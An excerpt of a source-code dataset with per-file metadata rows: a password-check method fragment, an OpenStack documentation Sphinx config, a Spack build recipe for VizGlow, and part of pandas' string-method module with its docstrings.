:param anOtpVal: This contains the "OTP" value, which is the static
password
:return: result of password check, 0 in case of success, -1 if fail
:rtype: int
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
res = sp.check_password(anOtpVal)
return res
| agpl-3.0 | -5,484,447,843,256,674,000 | 26.640523 | 77 | 0.568456 | false | 3.912118 | false | false | false |
AlekhyaMallina-Vedams/openstack-manuals | doc/common/source/conf.py | 1 | 4284 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
# import sys
import openstackdocstheme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# TODO(ajaeger): enable PDF building, for example add 'rst2pdf.pdfbuilder'
extensions = []
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Common documents'
bug_tag = u'common'
copyright = u'2015-2016, OpenStack contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# A few variables have to be set for the log-a-bug feature.
# giturl: The location of conf.py on Git. Must be set manually.
# gitsha: The SHA checksum of the bug description. Automatically extracted from git log.
# bug_tag: Tag for categorizing the bug. Must be set manually.
# These variables are passed to the logabug code via html_context.
giturl = u'http://git.openstack.org/cgit/openstack/openstack-manuals/tree/doc/common/source'
git_cmd = "/usr/bin/git log | head -n1 | cut -f2 -d' '"
gitsha = os.popen(git_cmd).read().strip('\n')
html_context = {"gitsha": gitsha, "bug_tag": bug_tag,
"giturl": giturl}
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 | 622,890,007,791,508,100 | 34.114754 | 92 | 0.721522 | false | 3.764499 | false | false | false |
skosukhin/spack | var/spack/repos/builtin/packages/vizglow/package.py | 1 | 4498 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import glob
import os
class Vizglow(Package):
"""VizGlow software tool is used for high-fidelity multi-dimensional
modeling of non-equilibrium plasma discharges.
Note: VizGlow is licensed software. You will need to create an account on
the EsgeeTech homepage and download VizGlow yourself. Spack will search
your current directory for a file of this format. Alternatively, add this
file to a mirror so that Spack can find it. For instructions on how to
set up a mirror, see http://spack.readthedocs.io/en/latest/mirrors.html"""
homepage = "http://esgeetech.com/products/vizglow-plasma-modeling/"
version('2.2alpha20', '2bef890c66f3a44aaf96f7c96788c89e', expand=False,
url="file://{0}/VizGlow_v2.2alpha20-Linux-x86_64-R09December2016-Install".format(os.getcwd()))
version('2.2alpha17', '1de268564363e0ee86f9ffff1c3b82e1', expand=False,
url="file://{0}/VizGlow_v2.2alpha17-R21November2016-Linux-x86_64-Install".format(os.getcwd()))
version('2.2alpha15', 'be2b5044f30f2b2c3bbe87a0037bf228', expand=False,
url="file://{0}/VizGlow_v2.2alpha15-Linux-x86_64-R31October2016-Install".format(os.getcwd()))
# depends_on('mesa') # TODO: mesa build doesn't work for me
depends_on('zlib')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libxrender')
depends_on('xterm')
# Can't get mozjs to build, packagekit -> polkit -> mozjs
# depends_on('packagekit+gtk')
depends_on('libcanberra+gtk')
# Licensing
license_required = True
license_comment = '#'
license_files = ['esgeelm.lic']
license_vars = ['ESGEE_LICENSE_FILE']
def configure(self, prefix):
# Dictionary of responses
responses = {
'CreateDesktopShortcut': 'No',
'CreateQuickLaunchShortcut': 'No',
'InstallDir': prefix
}
# Write response file
with open('spack-responses.txt', 'w') as response_file:
for key in responses:
response_file.write('{0}: {1}\n'.format(key, responses[key]))
def install(self, spec, prefix):
self.configure(prefix)
installer = glob.glob('VizGlow*Install')[0]
chmod = which('chmod')
chmod('+x', installer)
installer = Executable(installer)
installer('--mode', 'silent', '--response-file', 'spack-responses.txt')
self.filter_ld_library_path(spec, prefix)
def filter_ld_library_path(self, spec, prefix):
"""Run after install to inject dependencies into LD_LIBRARY_PATH.
If we don't do this, the run files will clear the LD_LIBRARY_PATH.
Since the installer is a binary file, we have no means of specifying
an RPATH to use."""
files = glob.glob(prefix + '/binaries/*.run')
ld_library_path = ':'.join([
spec['zlib'].prefix.lib,
spec['freetype'].prefix.lib,
spec['fontconfig'].prefix.lib,
spec['libxrender'].prefix.lib,
spec['libcanberra'].prefix.lib
])
for runfile in files:
filter_file('(export LD_LIBRARY_PATH=)$',
r'\1{0}'.format(ld_library_path),
runfile)
| lgpl-2.1 | -3,512,128,012,529,714,700 | 39.522523 | 106 | 0.642952 | false | 3.73278 | false | false | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/core/strings.py | 1 | 105891 | import codecs
from functools import wraps
import re
import textwrap
from typing import Dict, List
import warnings
import numpy as np
import pandas._libs.lib as lib
import pandas._libs.ops as libops
from pandas.util._decorators import Appender, deprecate_kwarg
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
is_scalar,
is_string_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCMultiIndex, ABCSeries
from pandas.core.dtypes.missing import isna
from pandas.core.algorithms import take_1d
from pandas.core.base import NoNewAttributesMixin
import pandas.core.common as com
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
_shared_docs = dict() # type: Dict[str, str]
def cat_core(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
list_with_sep = [sep] * (2 * len(list_of_columns) - 1)
list_with_sep[::2] = list_of_columns
return np.sum(list_with_sep, axis=0)
def cat_safe(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`.
Same signature as cat_core, but handles TypeErrors in concatenation, which
happen if the arrays in list_of columns have the wrong dtypes or content.
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
try:
result = cat_core(list_of_columns, sep)
except TypeError:
# if there are any non-string values (wrong dtype or hidden behind
# object dtype), np.sum will fail; catch and return with better message
for column in list_of_columns:
dtype = lib.infer_dtype(column, skipna=True)
if dtype not in ["string", "empty"]:
raise TypeError(
"Concatenation requires list-likes containing only "
"strings (or missing values). Offending values found in "
"column {}".format(dtype)
) from None
return result
def _na_map(f, arr, na_result=np.nan, dtype=object):
# should really _check_ for NA
return _map(f, arr, na_mask=True, na_value=na_result, dtype=dtype)
def _map(f, arr, na_mask=False, na_value=np.nan, dtype=object):
if not len(arr):
return np.ndarray(0, dtype=dtype)
if isinstance(arr, ABCSeries):
arr = arr.values
if not isinstance(arr, np.ndarray):
arr = np.asarray(arr, dtype=object)
if na_mask:
mask = isna(arr)
try:
convert = not all(mask)
result = lib.map_infer_mask(arr, f, mask.view(np.uint8), convert)
except (TypeError, AttributeError) as e:
# Reraise the exception if callable `f` got wrong number of args.
# The user may want to be warned by this, instead of getting NaN
p_err = (
r"((takes)|(missing)) (?(2)from \d+ to )?\d+ "
r"(?(3)required )positional arguments?"
)
if len(e.args) >= 1 and re.search(p_err, e.args[0]):
raise e
def g(x):
try:
return f(x)
except (TypeError, AttributeError):
return na_value
return _map(g, arr, dtype=dtype)
if na_value is not np.nan:
np.putmask(result, mask, na_value)
if result.dtype == object:
result = lib.maybe_convert_objects(result)
return result
else:
return lib.map_infer(arr, f)
def str_count(arr, pat, flags=0):
"""
Count occurrences of pattern in each string of the Series/Index.
This function is used to count the number of times a particular regex
pattern is repeated in each of the string elements of the
:class:`~pandas.Series`.
Parameters
----------
pat : str
Valid regular expression.
flags : int, default 0, meaning no flags
Flags for the `re` module. For a complete list, `see here
<https://docs.python.org/3/howto/regex.html#compilation-flags>`_.
**kwargs
For compatibility with other string methods. Not used.
Returns
-------
Series or Index
Same type as the calling object containing the integer counts.
See Also
--------
re : Standard library module for regular expressions.
str.count : Standard library version, without regular expression support.
Notes
-----
Some characters need to be escaped when passing in `pat`.
eg. ``'$'`` has a special meaning in regex and must be escaped when
finding this literal character.
Examples
--------
>>> s = pd.Series(['A', 'B', 'Aaba', 'Baca', np.nan, 'CABA', 'cat'])
>>> s.str.count('a')
0 0.0
1 0.0
2 2.0
3 2.0
4 NaN
5 0.0
6 1.0
dtype: float64
Escape ``'$'`` to find the literal dollar sign.
>>> s = pd.Series(['$', 'B', 'Aab$', '$$ca', 'C$B$', 'cat'])
>>> s.str.count('\\$')
0 1
1 0
2 1
3 2
4 2
5 0
dtype: int64
This is also available on Index
>>> pd.Index(['A', 'A', 'Aaba', 'cat']).str.count('a')
Int64Index([0, 0, 2, 1], dtype='int64')
"""
regex = re.compile(pat, flags=flags)
f = lambda x: len(regex.findall(x))
return _na_map(f, arr, dtype=int)
def str_contains(arr, pat, case=True, flags=0, na=np.nan, regex=True):
"""
Test if pattern or regex is contained within a string of a Series or Index.
Return boolean Series or Index based on whether a given pattern or regex is
contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Flags to pass through to the re module, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
regex : bool, default True
If True, assumes the pat is a regular expression.
If False, treats the pat as a literal string.
Returns
-------
Series or Index of boolean values
A Series or Index of boolean values indicating whether the
given pattern is contained within the string of each element
of the Series or Index.
See Also
--------
match : Analogous, but stricter, relying on re.match instead of re.search.
Series.str.startswith : Test if the start of each string element matches a
pattern.
Series.str.endswith : Same as startswith, but tests the end of string.
Examples
--------
Returning a Series of booleans using only a literal pattern.
>>> s1 = pd.Series(['Mouse', 'dog', 'house and parrot', '23', np.NaN])
>>> s1.str.contains('og', regex=False)
0 False
1 True
2 False
3 False
4 NaN
dtype: object
Returning an Index of booleans using only a literal pattern.
>>> ind = pd.Index(['Mouse', 'dog', 'house and parrot', '23.0', np.NaN])
>>> ind.str.contains('23', regex=False)
Index([False, False, False, True, nan], dtype='object')
Specifying case sensitivity using `case`.
>>> s1.str.contains('oG', case=True, regex=True)
0 False
1 False
2 False
3 False
4 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN` replaces NaN values
with `False`. If Series or Index does not contain NaN values
the resultant dtype will be `bool`, otherwise, an `object` dtype.
>>> s1.str.contains('og', na=False, regex=True)
0 False
1 True
2 False
3 False
4 False
dtype: bool
Returning 'house' or 'dog' when either expression occurs in a string.
>>> s1.str.contains('house|dog', regex=True)
0 False
1 True
2 True
3 False
4 NaN
dtype: object
Ignoring case sensitivity using `flags` with regex.
>>> import re
>>> s1.str.contains('PARROT', flags=re.IGNORECASE, regex=True)
0 False
1 False
2 True
3 False
4 NaN
dtype: object
Returning any digit using regular expression.
>>> s1.str.contains('\\d', regex=True)
0 False
1 False
2 False
3 True
4 NaN
dtype: object
Ensure `pat` is a not a literal pattern when `regex` is set to True.
Note in the following example one might expect only `s2[1]` and `s2[3]` to
return `True`. However, '.0' as a regex matches any character
followed by a 0.
>>> s2 = pd.Series(['40', '40.0', '41', '41.0', '35'])
>>> s2.str.contains('.0', regex=True)
0 True
1 True
2 False
3 True
4 False
dtype: bool
"""
if regex:
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
if regex.groups > 0:
warnings.warn(
"This pattern has match groups. To actually get the"
" groups, use str.extract.",
UserWarning,
stacklevel=3,
)
f = lambda x: bool(regex.search(x))
else:
if case:
f = lambda x: pat in x
else:
upper_pat = pat.upper()
f = lambda x: upper_pat in x
uppered = _na_map(lambda x: x.upper(), arr)
return _na_map(f, uppered, na, dtype=bool)
return _na_map(f, arr, na, dtype=bool)
def str_startswith(arr, pat, na=np.nan):
"""
Test if the start of each string element matches a pattern.
Equivalent to :meth:`str.startswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the start of each string element.
See Also
--------
str.startswith : Python standard library string method.
Series.str.endswith : Same as startswith, but tests the end of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'Bear', 'cat', np.nan])
>>> s
0 bat
1 Bear
2 cat
3 NaN
dtype: object
>>> s.str.startswith('b')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.startswith('b', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.startswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_endswith(arr, pat, na=np.nan):
"""
Test if the end of each string element matches a pattern.
Equivalent to :meth:`str.endswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the end of each string element.
See Also
--------
str.endswith : Python standard library string method.
Series.str.startswith : Same as endswith, but tests the start of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'bear', 'caT', np.nan])
>>> s
0 bat
1 bear
2 caT
3 NaN
dtype: object
>>> s.str.endswith('t')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.endswith('t', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.endswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_replace(arr, pat, repl, n=-1, case=None, flags=0, regex=True):
r"""
Replace occurrences of pattern/regex in the Series/Index with
some other string. Equivalent to :meth:`str.replace` or
:func:`re.sub`.
Parameters
----------
pat : str or compiled regex
String can be a character sequence or regular expression.
.. versionadded:: 0.20.0
`pat` also accepts a compiled regex.
repl : str or callable
Replacement string or a callable. The callable is passed the regex
match object and must return a replacement string to be used.
See :func:`re.sub`.
.. versionadded:: 0.20.0
`repl` also accepts a callable.
n : int, default -1 (all)
Number of replacements to make from start.
case : bool, default None
- If True, case sensitive (the default if `pat` is a string)
- Set to False for case insensitive
- Cannot be set if `pat` is a compiled regex
flags : int, default 0 (no flags)
- re module flags, e.g. re.IGNORECASE
- Cannot be set if `pat` is a compiled regex
regex : bool, default True
- If True, assumes the passed-in pattern is a regular expression.
- If False, treats the pattern as a literal string
- Cannot be set to False if `pat` is a compiled regex or `repl` is
a callable.
.. versionadded:: 0.23.0
Returns
-------
Series or Index of object
A copy of the object with all matching occurrences of `pat` replaced by
`repl`.
Raises
------
ValueError
* if `regex` is False and `repl` is a callable or `pat` is a compiled
regex
* if `pat` is a compiled regex and `case` or `flags` is set
Notes
-----
When `pat` is a compiled regex, all flags should be included in the
compiled regex. Use of `case`, `flags`, or `regex=False` with a compiled
regex will raise an error.
Examples
--------
When `pat` is a string and `regex` is True (the default), the given `pat`
is compiled as a regex. When `repl` is a string, it replaces matching
regex patterns as with :meth:`re.sub`. NaN value(s) in the Series are
left as is:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f.', 'ba', regex=True)
0 bao
1 baz
2 NaN
dtype: object
When `pat` is a string and `regex` is False, every `pat` is replaced with
`repl` as with :meth:`str.replace`:
>>> pd.Series(['f.o', 'fuz', np.nan]).str.replace('f.', 'ba', regex=False)
0 bao
1 fuz
2 NaN
dtype: object
When `repl` is a callable, it is called on every `pat` using
:func:`re.sub`. The callable should expect one positional argument
(a regex object) and return a string.
To get the idea:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)
0 <_sre.SRE_Match object; span=(0, 1), match='f'>oo
1 <_sre.SRE_Match object; span=(0, 1), match='f'>uz
2 NaN
dtype: object
Reverse every lowercase alphabetic word:
>>> repl = lambda m: m.group(0)[::-1]
>>> pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)
0 oof 123
1 rab zab
2 NaN
dtype: object
Using regex groups (extract second group and swap case):
>>> pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
>>> repl = lambda m: m.group('two').swapcase()
>>> pd.Series(['One Two Three', 'Foo Bar Baz']).str.replace(pat, repl)
0 tWO
1 bAR
dtype: object
Using a compiled regex with flags
>>> import re
>>> regex_pat = re.compile(r'FUZ', flags=re.IGNORECASE)
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace(regex_pat, 'bar')
0 foo
1 bar
2 NaN
dtype: object
"""
# Check whether repl is valid (GH 13438, GH 15055)
if not (is_string_like(repl) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set" " when pat is a compiled regex"
)
else:
# not a compiled regex
# set default case
if case is None:
case = True
# add case flag, if provided
if case is False:
flags |= re.IGNORECASE
if is_compiled_re or len(pat) > 1 or flags or callable(repl):
n = n if n >= 0 else 0
compiled = re.compile(pat, flags=flags)
f = lambda x: compiled.sub(repl=repl, string=x, count=n)
else:
f = lambda x: x.replace(pat, repl, n)
else:
if is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement " "pattern with regex=False"
)
if callable(repl):
raise ValueError("Cannot use a callable replacement when " "regex=False")
f = lambda x: x.replace(pat, repl, n)
return _na_map(f, arr)
def str_repeat(arr, repeats):
"""
Duplicate each string in the Series or Index.
Parameters
----------
repeats : int or sequence of int
Same value for all (int) or different value per (sequence).
Returns
-------
Series or Index of object
Series or Index of repeated string objects specified by
input parameter repeats.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
Single int repeats string in Series
>>> s.str.repeat(repeats=2)
0 aa
1 bb
2 cc
dtype: object
Sequence of int repeats corresponding string in Series
>>> s.str.repeat(repeats=[1, 2, 3])
0 a
1 bb
2 ccc
dtype: object
"""
if is_scalar(repeats):
def scalar_rep(x):
try:
return bytes.__mul__(x, repeats)
except TypeError:
return str.__mul__(x, repeats)
return _na_map(scalar_rep, arr)
else:
def rep(x, r):
try:
return bytes.__mul__(x, r)
except TypeError:
return str.__mul__(x, r)
repeats = np.asarray(repeats, dtype=object)
result = libops.vec_binop(com.values_from_object(arr), repeats, rep)
return result
def str_match(arr, pat, case=True, flags=0, na=np.nan):
"""
Determine if each string matches a regular expression.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
re module flags, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
Returns
-------
Series/array of boolean values
See Also
--------
contains : Analogous, but less strict, relying on re.search instead of
re.match.
extract : Extract matched groups.
"""
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
dtype = bool
f = lambda x: bool(regex.match(x))
return _na_map(f, arr, na, dtype=dtype)
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _groups_or_na_fun(regex):
"""Used in both extract_noexpand and extract_frame"""
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _str_extract_noexpand(arr, pat, flags=0):
"""
Find groups in each string in the Series using passed regular
expression. This function is called from
str_extract(expand=False), and can return Series, DataFrame, or
Index.
"""
from pandas import DataFrame, Index
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
if regex.groups == 1:
result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
name = _get_single_group_name(regex)
else:
if isinstance(arr, Index):
raise ValueError("only one regex group is supported with Index")
name = None
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if arr.empty:
result = DataFrame(columns=columns, dtype=object)
else:
result = DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=arr.index,
dtype=object,
)
return result, name
def _str_extract_frame(arr, pat, flags=0):
"""
For each subject string in the Series, extract groups from the
first match of regular expression pat. This function is called from
str_extract(expand=True), and always returns a DataFrame.
"""
from pandas import DataFrame
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if len(arr) == 0:
return DataFrame(columns=columns, dtype=object)
try:
result_index = arr.index
except AttributeError:
result_index = None
return DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=result_index,
dtype=object,
)
def str_extract(arr, pat, flags=0, expand=True):
r"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the
first match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
Flags from the ``re`` module, e.g. ``re.IGNORECASE``, that
modify regular expression matching for things like case,
spaces, etc. For more details, see :mod:`re`.
expand : bool, default True
If True, return DataFrame with one column per capture group.
If False, return a Series/Index if there is one capture group
or DataFrame if there are multiple capture groups.
.. versionadded:: 0.18.0
Returns
-------
DataFrame or Series or Index
A DataFrame with one row for each subject string, and one
column for each group. Any capture group names in regular
expression pat will be used for column names; otherwise
capture group numbers will be used. The dtype of each result
column is always object, even when no match is found. If
``expand=False`` and pat has only one capture group, then
return a Series (if subject is a Series) or Index (if subject
is an Index).
See Also
--------
extractall : Returns all matches (not just the first match).
Examples
--------
A pattern with two groups will return a DataFrame with two columns.
Non-matches will be NaN.
>>> s = pd.Series(['a1', 'b2', 'c3'])
>>> s.str.extract(r'([ab])(\d)')
0 1
0 a 1
1 b 2
2 NaN NaN
A pattern may contain optional groups.
>>> s.str.extract(r'([ab])?(\d)')
0 1
0 a 1
1 b 2
2 NaN 3
Named groups will become column names in the result.
>>> s.str.extract(r'(?P<letter>[ab])(?P<digit>\d)')
letter digit
0 a 1
1 b 2
2 NaN NaN
A pattern with one group will return a DataFrame with one column
if expand=True.
>>> s.str.extract(r'[ab](\d)', expand=True)
0
0 1
1 2
2 NaN
A pattern with one group will return a Series if expand=False.
>>> s.str.extract(r'[ab](\d)', expand=False)
0 1
1 2
2 NaN
dtype: object
"""
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand:
return _str_extract_frame(arr._orig, pat, flags=flags)
else:
result, name = _str_extract_noexpand(arr._parent, pat, flags=flags)
return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
r"""
For each subject string in the Series, extract groups from all
matches of regular expression pat. When each subject string in the
Series has exactly one match, extractall(pat).xs(0, level='match')
is the same as extract(pat).
.. versionadded:: 0.18.0
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
A ``re`` module flag, for example ``re.IGNORECASE``. These allow
to modify regular expression matching for things like case, spaces,
etc. Multiple flags can be combined with the bitwise OR operator,
for example ``re.IGNORECASE | re.MULTILINE``.
Returns
-------
DataFrame
A ``DataFrame`` with one row for each match, and one column for each
group. Its rows have a ``MultiIndex`` with first levels that come from
the subject ``Series``. The last level is named 'match' and indexes the
matches in each item of the ``Series``. Any capture group names in
regular expression pat will be used for column names; otherwise capture
group numbers will be used.
See Also
--------
extract : Returns first match only (not all matches).
Examples
--------
A pattern with one group will return a DataFrame with one column.
Indices with no matches will not appear in the result.
>>> s = pd.Series(["a1a2", "b1", "c1"], index=["A", "B", "C"])
>>> s.str.extractall(r"[ab](\d)")
0
match
A 0 1
1 2
B 0 1
Capture group names are used for column names of the result.
>>> s.str.extractall(r"[ab](?P<digit>\d)")
digit
match
A 0 1
1 2
B 0 1
A pattern with two groups will return a DataFrame with two columns.
>>> s.str.extractall(r"(?P<letter>[ab])(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
Optional groups that do not match are NaN in the result.
>>> s.str.extractall(r"(?P<letter>[ab])?(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
C 0 NaN 1
"""
regex = re.compile(pat, flags=flags)
# the regex must contain capture groups.
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
if isinstance(arr, ABCIndexClass):
arr = arr.to_series().reset_index(drop=True)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
match_list = []
index_list = []
is_mi = arr.index.nlevels > 1
for subject_key, subject in arr.items():
if isinstance(subject, str):
if not is_mi:
subject_key = (subject_key,)
for match_i, match_tuple in enumerate(regex.findall(subject)):
if isinstance(match_tuple, str):
match_tuple = (match_tuple,)
na_tuple = [np.NaN if group == "" else group for group in match_tuple]
match_list.append(na_tuple)
result_key = tuple(subject_key + (match_i,))
index_list.append(result_key)
from pandas import MultiIndex
index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
result = arr._constructor_expanddim(match_list, index=index, columns=columns)
return result
def str_get_dummies(arr, sep="|"):
"""
Split each string in the Series by sep and return a DataFrame
of dummy/indicator variables.
Parameters
----------
sep : str, default "|"
String to split on.
Returns
-------
DataFrame
Dummy variables corresponding to values of the Series.
See Also
--------
get_dummies : Convert categorical variable into dummy/indicator
variables.
Examples
--------
>>> pd.Series(['a|b', 'a', 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 1 0 0
2 1 0 1
>>> pd.Series(['a|b', np.nan, 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 0 0 0
2 1 0 1
"""
arr = arr.fillna("")
try:
arr = sep + arr + sep
except TypeError:
arr = sep + arr.astype(str) + sep
tags = set()
for ts in arr.str.split(sep):
tags.update(ts)
tags = sorted(tags - {""})
dummies = np.empty((len(arr), len(tags)), dtype=np.int64)
for i, t in enumerate(tags):
pat = sep + t + sep
dummies[:, i] = lib.map_infer(arr.values, lambda x: pat in x)
return dummies, tags
def str_join(arr, sep):
"""
Join lists contained as elements in the Series/Index with passed delimiter.
If the elements of a Series are lists themselves, join the content of these
lists using the delimiter passed to the function.
This function is an equivalent to :meth:`str.join`.
Parameters
----------
sep : str
Delimiter to use between list entries.
Returns
-------
Series/Index: object
The list entries concatenated by intervening occurrences of the
delimiter.
Raises
------
AttributeError
If the supplied Series contains neither strings nor lists.
See Also
--------
str.join : Standard library version of this method.
Series.str.split : Split strings around given separator/delimiter.
Notes
-----
If any of the list items is not a string object, the result of the join
will be `NaN`.
Examples
--------
Example with a list that contains non-string elements.
>>> s = pd.Series([['lion', 'elephant', 'zebra'],
... [1.1, 2.2, 3.3],
... ['cat', np.nan, 'dog'],
... ['cow', 4.5, 'goat'],
... ['duck', ['swan', 'fish'], 'guppy']])
>>> s
0 [lion, elephant, zebra]
1 [1.1, 2.2, 3.3]
2 [cat, nan, dog]
3 [cow, 4.5, goat]
4 [duck, [swan, fish], guppy]
dtype: object
Join all lists using a '-'. The lists containing object(s) of types other
than str will produce a NaN.
>>> s.str.join('-')
0 lion-elephant-zebra
1 NaN
